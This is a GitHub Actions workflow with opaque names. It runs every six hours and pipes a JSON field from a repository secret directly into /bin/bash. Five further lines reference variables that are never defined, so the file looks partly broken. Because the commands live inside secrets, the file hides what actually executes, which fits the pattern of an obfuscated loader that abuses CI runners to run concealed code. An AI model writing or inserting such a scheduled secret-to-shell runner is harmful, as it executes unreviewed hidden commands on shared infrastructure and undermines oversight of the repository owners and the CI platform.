name: iyuanzhan
on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: iyuanzhan
        env:
          hja39628: ${{ secrets.hja39628 }}
        run: |
          echo $hja39628 | jq -r .si6 | /bin/bash
          echo $wofdj46 | jq -r .jk50 | /bin/bash
          echo $vqob0 | jq -r .g3 | /bin/bash
          echo $sl38159 | jq -r .meysy48 | /bin/bash
          echo $fmmpe784 | jq -r .enteb90404 | /bin/bash
          echo $x0876 | jq -r .v1 | /bin/bash

